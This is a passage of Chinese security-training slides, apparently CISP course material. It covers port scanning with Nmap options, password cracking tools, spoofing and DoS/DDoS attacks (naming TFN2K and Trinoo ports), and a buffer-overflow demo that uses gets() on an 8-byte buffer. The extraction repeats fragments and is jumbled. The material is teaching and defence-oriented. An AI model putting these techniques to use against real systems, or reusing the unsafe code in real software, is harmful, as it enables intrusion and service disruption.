TCP/IP协议上;Xmasscan:这一技巧是往目标端口发送一个FIN、URG、PUSH置位的分组,如果目标端口关闭,则返回一个RST分组;Nullscan:发送所有标识位复位的TCP分组;UDP扫描130端口扫描类型常规扫描(tcpconnectscan)25端口扫描-常规扫描131扫描的方法─TCPConnectScan主要是利用TCP三次握手(Three-wayhandshaking)的连接方式來达到扫描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPConnectScan端口扫描-常规扫描26扫描的方法─TCPConnec端口扫描-半打开扫描132扫描的方法─TCPSYNScan沒有完成三次握手如左上图,当主机

A收到主机

B的回应后,並不会回传

ACK数据包给主机

B

。TCPSYNScan的优缺点优点:由于沒有完成TCP三次握手,所以不会在目标主机上留下记录。缺点:需有管理者的权限才可执行TCPSYNScan(以左上图为例,必需要有主机

A的管理者权限)。AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPSYNScan端口扫描-半打开扫描27扫描的方法─TCPSYNSc端口扫描-UDP扫描133扫描的方法─UDPPortScan由扫描主机发出UDP数据包给目标主机的UDPPort,並等待目标主机

Port送回ICMPUnreachable信息。若收到目标主机Port传回的ICMPUnreachable信息,则表示该

Port处于关闭的状态。若沒有收到目标主机Port传回的ICMPUnreachable信息,则表示该Port可能处于Listen状态。UDPPortScan的缺点UDP协议不可靠可能被防火墙过滤掉使用Nmap做

udpScan端口扫描-UDP扫描28扫描的方法─UDPPort端口扫描策略随机端口扫描慢扫描碎片扫描欺骗扫描协同扫描134端口扫描策略随机端口扫描29信息收集技术-漏洞扫描根据目标主机开放的不同应用和服务来扫描和判断是否存在或可能存在某些漏洞意义进行网络安全评估为网络系统的加固提供先期准备被网络攻击者加以利用来获取重要的数据信息135对一个信息系统来说,它的安全性不在于它是否采用了最新的加密算法或最先进的设备,而是由系统本身最薄弱之处,即漏洞所决定的。只要这个漏洞被发现,系统就有可能成为网络攻击的牺牲品。信息安全的“木桶理论”信息收集技术-漏洞扫描根据目标主机开放的不同应用和服务来扫描136信息收集技术-漏洞扫描工具网络设备漏洞扫描器CiscoAuditingTools集成化的漏洞扫描器NessusShadowSecurityScannereEye的RetinaInternetSecurityScannerGFILANguard

专业web扫描软件IBMappscanAcunetixWebVulnerability数据库漏洞扫描器ISSDatabaseScanneroscanner Oracle数据库扫描器Metacoretex

数据安全审计工具31信息收集技术-漏洞扫描工具网络设备漏洞扫描器工具介绍-端口扫描Nmap简介被称为“扫描器之王”有forUnix和forWin的两种版本需要Libpcap库和Winpcap库的支持能够进行普通扫描、各种高级扫描和操作系统类型鉴别等使用-sS:半开式扫描-sT:普通connect()扫描-sU:udp端口扫描-O:操作系统鉴别-P0:强行扫描(无论是否能够ping通目标)-p:指定端口范围-v:详细模式137工具介绍-端口扫描Nmap32工具介绍-端口扫描SuperScan简介基于Windows平台速度快,图形化界面使用傻瓜化138工具介绍-端口扫描SuperScan33漏洞扫描工具Nessus构架服务器端:基于Unix系统客户端:有GTK、Java和Win系统支持运作客户端连接服务器端,并下载插件和扫描策略真正的扫描由服务器端发起两者之间的通信通过加密认证优势:具有强大的插件功能完全免费,升级快速非常适合作为网络安全评估工具139漏洞扫描工具Nessus34漏洞扫描工具X-Scan国产自主开发完全免费比较古老,缺乏维护140漏洞扫描工具X-Scan35web扫描工具IBMAppScan141web扫描工具IBMAppScan36AcunetixWebVulnerabilityScanner优秀的Web安全测试软件142AcunetixWebVulnerabilitySca密码破解-利用人性懒惰143密码破解方法

还原

暴力破解密码工具

密码暴力破解工具

密码字典生成工具

密码破解-利用人性懒惰38密码破解方法密码破解-密码穷举144密码明文对明文密码进行加密对比密文更换密码明文已知密码加密算法及密文情况下的破解方法密码破解-密码穷举39密码明文对明文密码进行加密对比密文更换ID:cisppsw:123456Ok,youcanlogininID:cisppsw:No,youcannotloginin112123123412345123456OK,youcanlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotloginin密码破解-口令暴力猜解145ID:cisppsw:123456Ok,youcanl破解工具JohntheRipperL0Phtcrack……146破解工具JohntheRipper41字典生成器147根据用户规则快速生成各类密码字典攻击者常用的工具……字典生成器42根据用户规则快速生成各类密码字典欺骗攻击与拒绝服务攻击148知识子域:欺骗攻击原理与实例理解IP欺骗、ARP欺骗、DNS欺骗的原理和危害了解防范欺骗攻击的基本方法知识子域:拒绝服务工具原理与实例理解SYNFlood、UDPFlood、Land攻击、TearDrop攻击等典型DoS攻击的原理及危害理解DDoS攻击的原理了解防范DoS/DDoS攻击的基本方法欺骗攻击与拒绝服务攻击43知识子域:欺骗攻击原理与实例欺骗攻击定义BACHello,I’mB!欺骗攻击(Spoofing)是指通过伪造源于可信任地址的数据包以使一台机器认证另一台机器的复杂技术

149欺骗攻击定义BACHello,I’mB!欺骗攻击(Spoo欺骗攻击的主要方式IP欺骗DNS欺骗ARP欺骗TCP会话劫持路由欺骗……150欺骗攻击的主要方式IP欺骗45客户服务器Synsend连接请求回应(ISN)Syn+ack确认(ISN+1)会话过程151IP欺骗基础知识-三次握手客户服务器Synsend连接请求回应(ISN)Syn+acIP欺骗实现步骤IP欺骗攻击方法中包括了一系列攻击步骤确认攻击目标使要冒充主机无法响应目标主机猜正确的序数冒充受信主机进行会话152IP欺骗实现步骤IP欺骗攻击方法中包括了一系列攻击步骤确认攻IP欺骗实例讲解BAC同步flood攻击

连接请求伪造B进行系列会话A的序数规则153IP欺骗实例讲解BAC同步flood攻击连接请求伪造B进行防止IP欺骗154严格设置路由策略:拒绝来自网上,且声明源于本地地址的包使用最新的系统和软件,避免会话序号被猜出使用抗IP欺骗功能的产品严密监视网络,对攻击进行报警防止IP欺骗49严格设置路由策略:拒绝来自网上,且声明源于本ARP欺骗基础-Arp协议工作过程Bb:bbCc:ccAa:aaWho’sIPisWho’sIPisMACBb:bbisIsee,Iwillcache155ARP欺骗基础-Arp协议工作过程Bb:bbCc:ccAa:ARP欺骗实现Bb:bbCc:ccAa:aaMACcc:ccisIsee,IwillcacheMACdf:dfisIcouldn’tfind156ARP欺骗实现Bb:bbCc:ccAa:aa2ARP欺骗防御157使用静态ARP缓存IP与MAC地址绑定ARP防御工具ARP欺骗防御52使用静态ARP缓存DNS欺骗基础-DNS协议工作过程其他DNSIwillcacheIdon’tknow,Iwillaskother

It’sinmycache158DNS欺骗基础-DNS协议工作过程其他DNSIDNS欺骗实现Idon’tknow,IwillaskotherOtherDNSIwillcacheIt’sinmycache159DNS欺骗实现Idon’tknow,IwillaskDNS欺骗防御160安装最新版本的DNS软件关闭DNS服务递归功能限制域名服务器作出响应的地址限制域名服务器作出响应的递归请求地址限制发出请求的地址DNS欺骗防御55安装最新版本的DNS软件其他欺骗攻击-路由欺骗ICMP重定向报文欺骗RIP路由欺骗源径路由欺骗161其他欺骗攻击-路由欺骗ICMP重定向报文欺骗56拒绝服务攻击定义拒绝服务式攻击(DenialofService),顾名思义就是让被攻击的系统无法正常进行服务的攻击方式。拒绝服务攻击方式利用大量数据挤占网络带宽利用大量请求消耗系统性能利用协议实现缺陷利用系统处理方式缺陷162拒绝服务攻击定义拒绝服务式攻击(DenialofServ典型的拒绝服务攻击方式SYNFloodUDPFloodTeardropLANDSmurf……163典型的拒绝服务攻击方式SYNFlood58(syn)Hello,I’mhere(syn+ack)I’mready?I’mwaiting……SYNFlood(syn)Hello,I’mhere?I’mwaiting……(syn)Hello,I’mhere……I’mwaiting……I’mwaiting……I’mwaiting……(syn)Hello,I’mhere(syn+ack)UDPFLOODUDPFlood1)大量UDP小包冲击应用服务器(DNS、Radius认证等)2)利用系统服务形成流量(Echochargen)3)利用正常UDP服务发送大流量形成网络拥塞165UDPFLOODUDPFlood60LAND攻击运用IPSpoofing技术送出一连串SYN数据包给目标主机,让目标主机系统误以为这些数据包是由自己发送的。由于目标主机在处理这些数据包的时候,它自己并无法回应给自己SYN-ACK数据包,因而造成系统当机。1661(SYN)hello,I’m1Syn+AckAckLAND攻击运用IPSpoofing技术送出一连串SSYNSYN+ACKACKPSH1:1025……PSH1025:2049……PSH2049:3073……FINACKPSH1:1025……PSH

1000:2049……PSH2049:3073……试图重组时主机崩溃TearDrop(分片攻击)167SYNSYN+ACKACKPSH1:1025……PSH1Smurf攻击黑客伪装受害者IP中间网站目标子网络主机目标子网络主机目标子网络主机攻击信息大量ICMP封包(Layer3)子网络主机子网络主机子网络主机目标网站大量广播(Layer2)168Smurf攻击黑客中间网站目标子网络主机目标子网络主机目标子拒绝服务攻击的危害消耗带宽瘫痪服务器DNS网页电子邮件阻塞网络路由器交换器169拒绝服务攻击的危害64DDoS攻击原理170DDoS攻击原理65工具介绍TFN2KTrinoo1713133527665

27444

udpmaster

client..主机列表telnet

betaalmostdone

攻击指令目标主机nc

工具介绍TFN2K663133527444udpmaste拒绝服务攻击防御定期扫描过滤不必要的端口与服务节点配置防火墙/DDOS设备过滤IP地址限制SYN/ICMP流量检查来源172拒绝服务攻击防御67缓存溢出与网页脚本安全173知识子域:缓冲区溢出原理与实例理解缓冲区溢出的原理和危害了解防范缓冲区溢出的基本方法知识子域:网页脚本原理与实例理解SQL注入攻击的原理和危害了解防范SQL注入攻击的基本方法理解跨站脚本攻击的原理和危害了解防范跨站脚本攻击的基本方法知识子域:计算机取证了解计算机取证的概念和作用了解计算机取证的原则、基本步骤、常用方法和工具缓存溢出与网页脚本安全68知识子域:缓冲区溢出原理与实例缓存溢出缓存溢出基础缓存溢出原理缓存溢出简单示例缓冲区溢出防御174缓存溢出缓存溢出基础69缓存溢出—十年来攻与防的焦点175

原理

缓存溢出攻击利用编写不够严谨的程序,通过向程序的缓存区写入超过预定长度的数据,造成缓存的溢出,从而破坏程序的堆栈,导致程序执行流程的改变。

基础知识寄存器堆栈指针

缓存溢出—十年来攻与防的焦点70 缓存溢出基础-寄存器176寄存器说明功能eax累加器加法乘法指令的缺省寄存器,函数返回值ebx基址寄存器在内存寻址时存放基地址ecx计数器REP和LOOP指令的内定计数器edx除法寄存器存放整数除法产生的余数esi/edi源/目标索引寄存器在字符串操作指令中,ds:esi指向源字符串,es:edi指向目标字符串ebp栈底指针寄存器ss:ebp当前堆栈的栈底指针esp栈顶指针寄存器ss:esp当前堆栈的栈顶指针eip指令寄存器cs:eip指向下一条指令的地址eflags标志寄存器标志寄存器cs代码段寄存器当前执行的代码段ds数据段寄存器当前数据段ss堆栈段寄存器当前堆栈段缓存溢出基础-寄存器71寄存器说明功能eax累加器加法乘法指缓存溢出基础-堆栈及指针堆栈概念一种后进先出的数据结构堆栈特点后进先出堆栈生长方向与内存地址方向相反指针指针是指向内存单元的地址34H12H78H56H0108HESP栈顶堆栈(AL)(AH)34H12H78H56H0106HESP栈顶177栈底栈底缓存溢出基础-堆栈及指针堆栈概念34H12H78H56H01简单示例Buffer.c#include<stdio.h>intmain(){

charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}178程序作用:将用户输入的内容打印在屏幕上简单示例Buffer.c73程序作用:简单示例179简单示例74简单示例由于返回地址已经被覆盖,函数执行返回地址时会将覆盖内容当作返回地址,然后试图执行相应地址的指令,从而产生错误。180当我们全部输入a时,错误指令地址为0x616161,0x61是a的ASCII编码简单示例由于返回地址已经被覆盖,函数执行返回地址时会将75当181缓存溢出危害寻找程序漏洞编制缓存溢出程序精确控制跳转地址执行设定的代码获得系统权限或破坏系统危害:如果可精确控制内存跳转地址,就可以执行指定代码,获得权限或破坏系统76缓存溢出危害寻找程序漏洞编制缓存溢出程序精确控制跳转地址缓存溢出防御使用安全的字符串操作函数编写安全代码输入数据验证(过滤)指针完整性检查第三方软件防御……182缓存溢出防御使用安全的字符串操作函数77缓冲区溢出—演示183演示缓存溢出或缓存溢出深入讲解,讲师如可演示缓存溢出,请替换此页,如无法演示,请删除此页缓冲区溢出—演示78演示缓存溢出或缓存溢出深入讲解,讲师如可网页脚本安全脚本安全的概念SQL注入原理及危害跨站脚本原理及危害184网页脚本安全79概念脚本攻击是针对Web应用的攻击脚本攻击主要是针对动态网站进行的攻击,其原因是在建立动态网页的过程中没有对用户的输入输出进行有效的合法性验证动态网站交互性:即网页会根据用户的要求和选择而动态改变和响应,将浏览器作为客户端界面自动更新:即无须手动地更新HTML文档,便会自动生成新的页面,可以大大节省工作量因时因人而变:即当不同的时间、不同的人访问同一网址时会产生不同的页面185概念80脚本分类静态脚本HTML动态脚本aspphpjspvbs…186脚本分类静态脚本81SQL注入SQL注入(SQLInjection):程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作,操作系统Web应用数据库服务器123调用数据库查询直接调用操作系统命令通过数据库调用操作系统命令187SQL注入SQL注入(SQLInjeSQL注入基础知识SQL(StructuredQueryLanguage):结构化的查询语言,是关系型数据库通讯的标准语言。查询:Selects

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论